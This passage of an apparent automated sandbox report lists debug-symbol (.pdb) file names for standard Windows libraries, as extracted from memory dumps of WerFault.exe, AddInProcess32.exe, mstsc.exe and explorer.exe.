Source: Binary string: SLC.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdblR5 source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: StructuredQuery.pdbYS` source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdbiS0 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: d3d10warp.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: grooveex.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb6u source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb)Sp source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb| source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdbyS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: twinapi.pdbg source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PlayToDevice.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb1SX source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: 5.pdb2R source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb%jI source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows.pdb source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdbuj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Data.Activities.pdbaS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: SettingMonitor.pdb:uT source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdbIS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.UI.Immersive.pdb5SD source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb0t/ source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nsi.pdbRjz source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mlang.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: pcacli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: sppc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb0 source: WerFault.exe, 0000000A.00000003.747320665.000001EDC8062000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdbuS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: avrt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb{ source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: smartscreenps.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb0 source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdbn source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdbqS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdbIj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdbQSx source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb%St source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: stobject.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: audioses.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdbUSd source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb0 source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: sapi_onecore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ninput.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000A.00000003.740772791.000001EDC777B000.00000004.00000001.sdmp
Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdbMS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PhotoMetadataHandler.pdb]Sl source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb!SH source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cdp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdba source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdbmS< source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: drprov.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdbSP source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.722744884.0000000001290000.00000040.00000001.sdmp, mstsc.exe, 00000006.00000002.1032811979.0000000004750000.00000040.00000001.sdmp
Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: TaskFlowDataEngine.pdbeS4 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Deviceovs.pdb source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cscui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb=SL source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdbv source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbh source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000A.00000003.726046312.000001EDC6DF6000.00000004.00000001.sdmp
Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdbASh source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdbES source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
